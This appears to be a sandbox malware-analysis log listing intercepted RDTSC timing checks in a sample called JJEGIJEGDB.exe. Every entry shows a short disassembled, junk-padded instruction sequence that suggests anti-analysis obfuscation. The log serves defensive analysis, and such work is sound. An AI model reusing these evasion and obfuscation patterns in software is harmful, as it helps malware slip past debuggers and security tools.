                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BEE11F second address: BEE135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F34D94219DEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BEE135 second address: BEE213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F34D8F44CC0h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F34D8F44CC0h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jmp 00007F34D8F44CC0h 0x0000001f pop eax 0x00000020 call 00007F34D8F44CC5h 0x00000025 mov esi, dword ptr [ebp+122D360Dh] 0x0000002b pop esi 0x0000002c push 00000003h 0x0000002e mov edi, dword ptr [ebp+122D1F3Dh] 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 mov dword ptr [ebp+122D1BF6h], ebx 0x0000003d pop edx 0x0000003e push 00000003h 0x00000040 jnp 00007F34D8F44CB9h 0x00000046 movzx edx, cx 0x00000049 call 00007F34D8F44CB9h 0x0000004e push edi 0x0000004f jmp 00007F34D8F44CBEh 0x00000054 pop edi 0x00000055 push eax 0x00000056 push esi 0x00000057 jmp 00007F34D8F44CBDh 0x0000005c pop esi 0x0000005d mov eax, dword ptr [esp+04h] 0x00000061 jnp 00007F34D8F44CC2h 0x00000067 jp 00007F34D8F44CBCh 0x0000006d mov eax, dword ptr [eax] 0x0000006f jmp 00007F34D8F44CC6h 0x00000074 mov dword ptr [esp+04h], eax 0x00000078 push ebx 0x00000079 push eax 0x0000007a push edx 0x0000007b jp 00007F34D8F44CB6h 0x00000081 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BEE213 second address: BEE272 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F34D94219D8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 call 00007F34D94219DDh 0x00000027 pushad 0x00000028 mov dword ptr [ebp+122D2383h], ebx 0x0000002e mov dword ptr [ebp+122D22BAh], edi 0x00000034 popad 0x00000035 pop edx 0x00000036 lea ebx, dword ptr [ebp+12442E53h] 0x0000003c or dword ptr [ebp+122D2097h], edi 0x00000042 push eax 0x00000043 push ebx 0x00000044 jc 00007F34D94219DCh 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BEE36C second address: BEE385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BEE385 second address: BEE38F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BEE38F second address: BEE40E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F34D8F44CC5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F34D8F44CB8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D1F1Dh], ebx 0x0000002b push 00000003h 0x0000002d mov di, si 0x00000030 push 00000000h 0x00000032 call 00007F34D8F44CBFh 0x00000037 mov edi, dword ptr [ebp+122D33E9h] 0x0000003d pop esi 0x0000003e mov dword ptr [ebp+122D237Eh], ebx 0x00000044 push 00000003h 0x00000046 mov esi, dword ptr [ebp+122D17C0h] 0x0000004c mov esi, dword ptr [ebp+122D3571h] 0x00000052 push A68CC8A4h 0x00000057 push edx 0x00000058 pushad 0x00000059 jno 00007F34D8F44CB6h 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BEE40E second address: BEE443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 xor dword ptr [esp], 668CC8A4h 0x0000000d mov dword ptr [ebp+122D23ACh], edi 0x00000013 lea ebx, dword ptr [ebp+12442E5Eh] 0x00000019 mov dx, 5C8Bh 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F34D94219E1h 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BEE443 second address: BEE45D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BDEB38 second address: BDEB42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F34D94219D6h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BDEB42 second address: BDEB48 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BDEB48 second address: BDEB50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BDEB50 second address: BDEB54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BDEB54 second address: BDEB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F34D94219D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jp 00007F34D94219D6h 0x00000017 jmp 00007F34D94219DBh 0x0000001c popad 0x0000001d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BDEB77 second address: BDEB7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C0C61C second address: C0C620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C0C620 second address: C0C626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C0C626 second address: C0C658 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F34D94219E7h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F34D94219D6h 0x0000001a jno 00007F34D94219D6h 0x00000020 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C0C658 second address: C0C65C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C0C7C4 second address: C0C7DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C0C7DF second address: C0C7E9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F34D8F44CBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C0C7E9 second address: C0C81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D94219E5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d jmp 00007F34D94219DFh 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C0C95D second address: C0C963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C0C963 second address: C0C988 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pushad 0x00000010 jmp 00007F34D94219E3h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C0C988 second address: C0C9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CC5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C0C9A6 second address: C0C9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C0CC98 second address: C0CCAF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007F34D8F44CB6h 0x00000009 js 00007F34D8F44CB6h 0x0000000f pop edx 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C0CF85 second address: C0CF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C0CF8B second address: C0CF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C0D0BE second address: C0D0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F34D94219E1h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C0D23A second address: C0D247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F34D8F44CB6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C0D247 second address: C0D27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D94219E6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F34D94219E8h 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C0D415 second address: C0D419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C0D419 second address: C0D41F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C0D41F second address: C0D429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C0D429 second address: C0D438 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F34D94219D6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C10367 second address: C1036B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C114EE second address: C114FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D94219DAh 0x00000009 popad 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C11683 second address: C1168D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F34D8F44CB6h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1168D second address: C11691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BE207C second address: BE20A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F34D8F44CB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push edi 0x0000000e jmp 00007F34D8F44CC2h 0x00000013 push eax 0x00000014 push edx 0x00000015 jnl 00007F34D8F44CB6h 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BE20A4 second address: BE20AE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F34D94219D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C19175 second address: C1917B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BE54DD second address: BE54EB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BE54EB second address: BE54F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C18E60 second address: C18E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1C523 second address: C1C527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1C527 second address: C1C53C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F34D94219DBh 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1CB26 second address: C1CB2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1CB2C second address: C1CB30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1D2E6 second address: C1D335 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F34D8F44CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b xchg eax, ebx 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F34D8F44CB8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jmp 00007F34D8F44CC8h 0x0000002b nop 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1D900 second address: C1D94E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx edi, bx 0x0000000c xchg eax, ebx 0x0000000d jno 00007F34D94219F5h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F34D94219E9h 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1DF12 second address: C1DF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1DF1F second address: C1DF3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1DF3C second address: C1DF59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC9h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1E7EF second address: C1E7F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1F6A5 second address: C1F6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F34D8F44CB6h 0x0000000a popad 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1E66A second address: C1E674 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1F6B0 second address: C1F71D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F34D8F44CC2h 0x00000008 jmp 00007F34D8F44CBCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 cmc 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F34D8F44CB8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D1C77h], esi 0x00000035 push 00000000h 0x00000037 pushad 0x00000038 jmp 00007F34D8F44CC6h 0x0000003d mov cx, 87F9h 0x00000041 popad 0x00000042 mov dword ptr [ebp+122D23B7h], esi 0x00000048 push eax 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1E674 second address: C1E682 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C201B4 second address: C201B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C2024C second address: C20251 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1FF99 second address: C1FFA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C20251 second address: C20261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C20261 second address: C20266 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C20AFF second address: C20B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C21640 second address: C2164B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F34D8F44CB6h 0x0000000a popad 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C20B04 second address: C20B09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C22049 second address: C2204F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C20B09 second address: C20B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C22CFD second address: C22D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C22D03 second address: C22D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F34D94219DCh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jl 00007F34D94219D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C22D21 second address: C22D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C2447F second address: C24483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C24483 second address: C24487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C24487 second address: C244D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F34D94219D8h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 push 00000000h 0x00000023 jp 00007F34D94219DCh 0x00000029 sub ebx, dword ptr [ebp+1244CD30h] 0x0000002f push 00000000h 0x00000031 or edi, dword ptr [ebp+122D1F27h] 0x00000037 xchg eax, esi 0x00000038 push ecx 0x00000039 jl 00007F34D94219DCh 0x0000003f pop ecx 0x00000040 push eax 0x00000041 push edi 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C244D6 second address: C244DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
